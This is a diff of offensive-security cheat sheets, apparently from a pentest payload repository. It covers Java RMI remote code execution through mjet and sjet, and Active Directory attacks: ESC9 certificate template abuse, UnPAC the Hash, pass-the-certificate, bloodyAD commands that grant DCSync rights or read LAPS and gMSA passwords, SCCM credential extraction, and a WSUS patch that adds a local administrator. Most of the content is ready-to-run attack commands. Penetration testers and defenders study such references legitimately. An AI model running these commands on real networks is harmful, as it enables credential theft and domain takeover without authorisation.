* [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification)
|
||||
* [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key)
|
||||
* [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
|
||||
* [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
|
||||
* [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
|
||||
|
||||
## References
|
||||
|
||||
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
||||
|
@ -1,25 +1,27 @@
|
||||
# Java RMI
|
||||
|
||||
> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host.
|
||||
> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE.
|
||||
> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out
|
||||
> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together
|
||||
> with a summary of currently known attack techniques.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Detection](#detection)
|
||||
* [Exploitation](#exploitation)
|
||||
* [Requirements](#requirements)
|
||||
* [Detection](#detection)
|
||||
* [Remote Command Execution](#remote-command-execution)
|
||||
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
|
||||
* [References](#references)
|
||||
|
||||
## Exploitation
|
||||
## Tools
|
||||
|
||||
### Requirements
|
||||
- Jython
|
||||
- The JMX server can connect to a http service that is controlled by the attacker
|
||||
- JMX authentication is not enabled
|
||||
- [sjet](https://github.com/siberas/sjet)
|
||||
- [mjet](https://github.com/mogwailabs/mjet)
|
||||
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
|
||||
|
||||
## Detection
|
||||
|
||||
### Detection
|
||||
|
||||
Using [nmap](https://nmap.org/):
|
||||
```powershell
|
||||
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
|
||||
1089/tcp open java-rmi Java RMI
|
||||
@ -33,7 +35,45 @@ $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TA
|
||||
| javax.management.remote.rmi.RMIServerImpl_Stub
|
||||
```
|
||||
|
||||
### Remote Command Execution
|
||||
Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
|
||||
```bash
|
||||
$ rmg scan 172.17.0.2 --ports 0-65535
|
||||
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
|
||||
[+]
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC)
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC)
|
||||
[+] [6234 / 6234] [#############################] 100%
|
||||
[+]
|
||||
[+] Portscan finished.
|
||||
```
|
||||
|
||||
```bash
|
||||
$ rmg enum 172.17.0.2 9010
|
||||
[+] RMI registry bound names:
|
||||
[+]
|
||||
[+] - plain-server2
|
||||
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
|
||||
[+] - legacy-service
|
||||
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
|
||||
[+] - plain-server
|
||||
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
|
||||
[...]
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
### RCE using sjet or mjet
|
||||
|
||||
#### Requirements
|
||||
- Jython
|
||||
- The JMX server can connect to a http service that is controlled by the attacker
|
||||
- JMX authentication is not enabled
|
||||
|
||||
#### Remote Command Execution
|
||||
|
||||
The attack involves the following steps:
|
||||
* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
|
||||
@ -59,5 +99,6 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
|
||||
|
||||
## References
|
||||
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
|
||||
* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
|
||||
|
@ -62,7 +62,6 @@
|
||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
- [Using impacket](#using-impacket)
|
||||
- [Using Rubeus](#using-rubeus)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
|
||||
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||
@ -82,8 +81,10 @@
|
||||
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [ESC9 - No Security Extension](#esc9---no-security-extension)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
- [Shadow Credentials](#shadow-credentials)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||
@ -112,6 +113,7 @@
|
||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||
- [PrivExchange attack](#privexchange-attack)
|
||||
- [SCCM Deployment](#sccm-deployment)
|
||||
- [SCCM Network Access Accounts](#sccm-network-access-accounts)
|
||||
- [WSUS Deployment](#wsus-deployment)
|
||||
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
|
||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
@ -257,6 +259,8 @@ Use the correct collector
|
||||
* Collect more data for certificates exploitation using Certipy
|
||||
```ps1
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
|
||||
```
|
||||
|
||||
Then import the zip/json files into the Neo4J database and query them.
|
||||
@ -717,7 +721,7 @@ Requirements:
|
||||
|
||||
#### samAccountName spoofing
|
||||
|
||||
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller.
|
||||
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.
|
||||
|
||||
**Requirements**
|
||||
|
||||
@ -1666,7 +1670,7 @@ Mitigations:
|
||||
|
||||
### Pass-the-Ticket Silver Tickets
|
||||
|
||||
Forging a TGS require machine account password (key) or NTLM hash of the service account.
|
||||
Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.
|
||||
|
||||
```powershell
|
||||
# Create a ticket for the service
|
||||
@ -1703,7 +1707,7 @@ Mitigations:
|
||||
|
||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||
|
||||
Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
|
||||
|
||||
* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite
|
||||
@ -1915,21 +1919,6 @@ root@kali:~$ klist
|
||||
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
||||
```
|
||||
|
||||
### UnPAC The Hash
|
||||
|
||||
* Windows
|
||||
```ps1
|
||||
# request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
||||
C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||
```
|
||||
* Linux
|
||||
```ps1
|
||||
# obtain a TGT by validating a PKINIT pre-authentication
|
||||
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
|
||||
# use the session key to recover the NT hash
|
||||
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
||||
```
|
||||
|
||||
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
|
||||
|
||||
@ -2236,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
|
||||
* Find ADCS Server
|
||||
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
|
||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
|
||||
|
||||
#### ESC1 - Misconfigured Certificate Templates
|
||||
|
||||
@ -2474,6 +2463,45 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
certipy relay -ca 172.16.19.100
|
||||
```
|
||||
|
||||
|
||||
#### ESC9 - No Security Extension
|
||||
|
||||
Requirements:
|
||||
* `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
|
||||
* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
|
||||
* Certificate specifies `Any Client` authentication EKU
|
||||
* `GenericWrite` over any account A to compromise any account B
|
||||
|
||||
**Scenario**
|
||||
|
||||
John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local.
|
||||
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
|
||||
|
||||
* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
|
||||
```ps1
|
||||
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
|
||||
```
|
||||
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
|
||||
```ps1
|
||||
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
|
||||
```
|
||||
* Request the vulnerable certificate template ESC9 from Jane's account.
|
||||
```ps1
|
||||
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
|
||||
# userPrincipalName in the certificate is Administrator
|
||||
# the issued certificate contains no "object SID"
|
||||
```
|
||||
* Restore userPrincipalName of Jane to Jane@corp.local.
|
||||
```ps1
|
||||
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
|
||||
```
|
||||
* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
|
||||
```ps1
|
||||
certipy auth -pfx administrator.pfx -domain corp.local
|
||||
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
|
||||
```
|
||||
|
||||
|
||||
#### Certifried CVE-2022-26923
|
||||
|
||||
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
|
||||
@ -2516,6 +2544,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
|
||||
#### Pass-The-Certificate
|
||||
|
||||
> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
|
||||
|
||||
* Windows
|
||||
```ps1
|
||||
# Information about a cert file
|
||||
@ -2523,6 +2553,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
|
||||
# From a Base64 PFX
|
||||
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||
|
||||
# Grant DCSync rights to an user
|
||||
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid <user_SID>
|
||||
# To restore
|
||||
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
|
||||
```
|
||||
* Linux
|
||||
```ps1
|
||||
@ -2534,8 +2569,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
|
||||
# PFX certificate (file) + password (string, optionnal)
|
||||
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
|
||||
# Using Certipy
|
||||
certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
|
||||
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
|
||||
```
|
||||
|
||||
### UnPAC The Hash
|
||||
|
||||
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
|
||||
|
||||
* Windows
|
||||
```ps1
|
||||
# Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
||||
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||
```
|
||||
* Linux
|
||||
```ps1
|
||||
# Obtain a TGT by validating a PKINIT pre-authentication
|
||||
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
|
||||
# Use the session key to recover the NT hash
|
||||
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
||||
```
|
||||
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
@ -2593,10 +2650,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
# Get a TGT using the newly acquired certificate via PKINIT
|
||||
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
|
||||
|
||||
# Get a TGS for the target account
|
||||
# Get a ST (service ticket) for the target account
|
||||
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v
|
||||
|
||||
# Utilize the TGS for future activity
|
||||
# Utilize the ST for future activity
|
||||
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
|
||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
||||
```
|
||||
@ -2694,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
|
||||
* using bloodyAD:
|
||||
`bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'`
|
||||
|
||||
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
|
||||
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it.
|
||||
```powershell
|
||||
# Check for interesting permissions on accounts:
|
||||
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
|
||||
@ -2799,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
|
||||
* On Linux:
|
||||
```bash
|
||||
# Give DCSync right to the principal identity
|
||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2
|
||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2
|
||||
|
||||
# Remove right after DCSync
|
||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2
|
||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
|
||||
```
|
||||
|
||||
* WriteDACL on Group
|
||||
@ -2810,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
|
||||
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
|
||||
net group "INTERESTING_GROUP" User1 /add /domain
|
||||
```
|
||||
Or
|
||||
```powershell
|
||||
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp
|
||||
|
||||
# Remove right
|
||||
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
|
||||
```
|
||||
|
||||
#### WriteOwner
|
||||
|
||||
@ -2818,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
|
||||
```powershell
|
||||
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
|
||||
```
|
||||
Or
|
||||
```powershell
|
||||
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
|
||||
```
|
||||
|
||||
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
|
||||
|
||||
@ -2829,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
|
||||
```powershell
|
||||
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
||||
```
|
||||
Or for a given computer
|
||||
```powershell
|
||||
bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
|
||||
```
|
||||
|
||||
|
||||
#### ReadGMSAPassword
|
||||
@ -2843,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
|
||||
# Decode the data structure using the DSInternals module
|
||||
ConvertFrom-ADManagedPasswordBlob $mp
|
||||
```
|
||||
Or
|
||||
```powershell
|
||||
python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
|
||||
```
|
||||
|
||||
#### ForceChangePassword
|
||||
|
||||
@ -3060,14 +3136,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /
|
||||
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
|
||||
```
|
||||
|
||||
#### Use the Trust Ticket file to get a TGS for the targeted service
|
||||
#### Use the Trust Ticket file to get a ST for the targeted service
|
||||
|
||||
```powershell
|
||||
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
|
||||
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
|
||||
```
|
||||
|
||||
Inject the TGS file and access the targeted service with the spoofed rights.
|
||||
Inject the ST file and access the targeted service with the spoofed rights.
|
||||
|
||||
```powershell
|
||||
kirbikator lsa .\ticket.kirbi
|
||||
@ -3104,7 +3180,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
|
||||
|
||||
### Kerberos Unconstrained Delegation
|
||||
|
||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
|
||||
> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
|
||||
|
||||
@ -3261,7 +3337,7 @@ PS> ls \\dc01.offense.local\c$
|
||||
|
||||
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||
|
||||
> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
|
||||
1. Import **Powermad** and **Powerview**
|
||||
|
||||
@ -3465,7 +3541,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
|
||||
```
|
||||
* Compromise management server, use locate to find primary server
|
||||
* use Inspect on primary server to view who you can target
|
||||
* Use `inspect` on primary server to view who you can target
|
||||
```ps1
|
||||
MalSCCM.exe inspect /all
|
||||
MalSCCM.exe inspect /computers
|
||||
@ -3504,6 +3580,28 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||
MalSCCM.exe group /delete /groupname:TargetGroup
|
||||
```
|
||||
|
||||
|
||||
### SCCM Network Access Accounts
|
||||
|
||||
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
||||
|
||||
* Find SCCM blob
|
||||
```ps1
|
||||
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
||||
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
||||
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
||||
```
|
||||
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
|
||||
```ps1
|
||||
.\SharpDPAPI.exe SCCM
|
||||
```
|
||||
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
||||
```ps1
|
||||
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
|
||||
ConvertFrom-SddlString ""
|
||||
```
|
||||
|
||||
|
||||
### WSUS Deployment
|
||||
|
||||
> Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network
|
||||
@ -3514,7 +3612,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||
|
||||
1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate`
|
||||
2. After WSUS Server compromise: `SharpWSUS.exe inspect`
|
||||
3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
|
||||
3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
|
||||
4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"`
|
||||
5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local`
|
||||
6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group`
|
||||
@ -3821,7 +3919,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
||||
@ -3873,3 +3971,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
|
||||
